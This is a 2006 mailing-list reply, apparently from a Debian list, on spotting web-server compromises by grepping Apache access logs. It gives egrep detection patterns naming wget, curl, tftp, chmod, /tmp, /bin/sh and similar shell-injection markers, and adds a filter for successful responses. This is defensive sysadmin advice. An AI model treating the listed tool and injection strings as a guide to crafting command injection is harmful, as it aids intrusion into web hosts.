[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: we were attacked

On Sat, Apr 08, 2006 at 02:22:07PM +0200, Andrew Miehs wrote:
> > On Sat, Apr 08, 2006 at 02:03:49AM +0300, Juha-Matti Tapio wrote:
> >> Problems like this aren't simple to diagnose on webhosting
> >> environments.
> >
> > actually, they're not that hard - you can find most of them by grepping
> > for half a dozen or so likely strings in the apache access log - "wget",
> > "curl", "snarf", "/bin/sh", "/bin/perl", ";", and as a last resort,
> > "%20" (for encoded space characters which nearly all shell exploits will
> > have in them)
> Actually - it IS that hard!

no, it's not.

any half-way competent sysadmin WILL have the skill and the experience to 
eliminate noise when searching log files.  by definition - if they don't have
the skill/experience then they are NOT even remotely competent.

for example, along with the regexp i posted in my last message you can pipe
the output of that grep into another grep which finds only requests that were
successful (i.e. 2xx response codes):

  egrep 'wget|tftp|curl|snarf|chmod|(%2f|\/)tmp' LOGFILE | \
	egrep '" 2[0-9][0-9] '

note that the regexp starts with a " character - that is to match the
quote char at the end of the request string, so you match the response
code and not the byte count of the result returned by apache.

that will eliminate almost all of the noise (i.e. script-kiddie requests
for exploitable CGI or PHP scripts that don't exist on your system)

BTW, you can use such noise to your advantage. even if you're
having trouble finding the exact script, you can make a list of IP
addresses/hostnames that are making failed (404) exploit requests and
search for them. that will eliminate all good requests and leave you
with just the exploit attempts. refine the search further and you will
inevitably find the culprit.

this is basic sysadmin 101 stuff. anyone running a server on the net
SHOULD know this stuff. they should certainly be at least willing to
learn it rather than whine "it's too hard".

> If you have 1000 requests per second on a box - and these are dynamic
> requests, NOT just for index.html.....

well, duh.  so there are a lot of requests - big deal.  it's your job
to deal with that situation.

> Although I too am not a friend of this type of diagnosis, it is often
> the fastest and easiest way to work out what is happening...

yes, of course. in fact, working out what is happening is the ONLY way
to fix it. that was my point precisely. and one way of finding out what
is happening is to search the log files for suspicious activity.

> Especially when management is standing behind you - there are many
> 'BETTER' ways, but try and do them all correctly with the shadow of
> your boss over your table...

it's also your job to be able to do these things when they're really
needed - and that especially includes high pressure situations.


craig sanders <cas@taz.net.au>           (part time cyborg)

Reply to: